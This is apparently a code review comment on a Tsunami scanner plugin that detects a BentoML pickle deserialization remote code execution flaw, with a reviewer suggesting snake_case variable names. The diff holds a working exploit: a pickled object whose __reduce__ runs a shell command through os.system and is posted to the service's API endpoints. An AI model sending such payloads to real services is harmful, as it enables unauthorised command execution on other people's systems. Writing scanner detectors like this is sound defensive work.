py_plugins/bentoml_deserialization_rce/bentoml_rce_detector.py

```diff
@@ -0,0 +1,209 @@
+        )
+
+    def _IsServiceVulnerable(
+            self, network_service: tsunami_plugin.NetworkService
+    ) -> bool:
+        """Check if network service may result in RCE."""
+
+        # find an endpoint with "Service APIs" tag
+        paths_and_methods = []
+        url = self._BuildUrl(network_service, "docs.json")
+        request = (
+            HttpRequest.get(url)
+            .with_empty_headers()
+            .build()
+        )
+        try:
+            response = self.http_client.send(request, network_service)
+            for pathName in response.body_json()["paths"]:
+                for httpMethod in response.body_json()["paths"][pathName]:
+                    for tags in response.body_json()["paths"][pathName][httpMethod]["tags"]:
+                        if tags == "Service APIs":
+                            paths_and_methods.append([pathName, httpMethod])
+        except Exception:  # pylint: disable=broad-exception-caught
+            logging.exception('Unable to query %s', url)
+
+        if len(paths_and_methods) == 0:
+            # there are no Service APIs to exploit
+            return False
+
+        config = pg.PayloadGeneratorConfig(
+            vulnerability_type=pg.PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE,
+            interpretation_environment=pg.PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL,
+            execution_environment=pg.PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT,
+        )
+        payload = self.payload_generator.generate(config)
+        if not payload.get_payload_attributes().uses_callback_server:
+            return False
+
+        class Payload(object):
+            def __reduce__(self):
+                import os
+                return os.system, (f'/bin/sh -c "{payload.get_payload()}"',)
+
+        rce_command = pickle.dumps(Payload())
+        responsesBody = []
+        for path_and_method in paths_and_methods:
+            url = self._BuildUrl(network_service, path_and_method[0])
+            request = (
+                HttpRequest.builder().set_method(path_and_method[1].upper()).set_url(url)
+                .set_headers(
+                    HttpHeaders.builder()
+                    .add_header("Content-Type", "application/vnd.bentoml+pickle")
+                    .build()
+                )
+                .set_request_body(rce_command)
+                .build()
+            )
+            try:
+                response = self.http_client.send(request, network_service)
+                responsesBody.append(response.body)
+            except Exception:  # pylint: disable=broad-exception-caught
+                logging.exception('Unable to query %s', url)
+            time.sleep(_SLEEP_TIME_SEC)
+            for responseBody in responsesBody:
+                if payload.check_if_executed(responseBody):
+                    return True
```

Comment:
Use consistent snake_case style for variables

```suggestion
        responses_body = []
        for path_and_method in paths_and_methods:
            url = self._BuildUrl(network_service, path_and_method[0])
            request = (
                HttpRequest.builder().set_method(path_and_method[1].upper()).set_url(url)
                .set_headers(
                    HttpHeaders.builder()
                    .add_header("Content-Type", "application/vnd.bentoml+pickle")
                    .build()
                )
                .set_request_body(rce_command)
                .build()
            )
            try:
                response = self.http_client.send(request, network_service)
                responses_body.append(response.body)
            except Exception:  # pylint: disable=broad-exception-caught
                logging.exception('Unable to query %s', url)
            time.sleep(_SLEEP_TIME_SEC)
            for response_body in responses_body:
                if payload.check_if_executed(response_body):
                    return True
```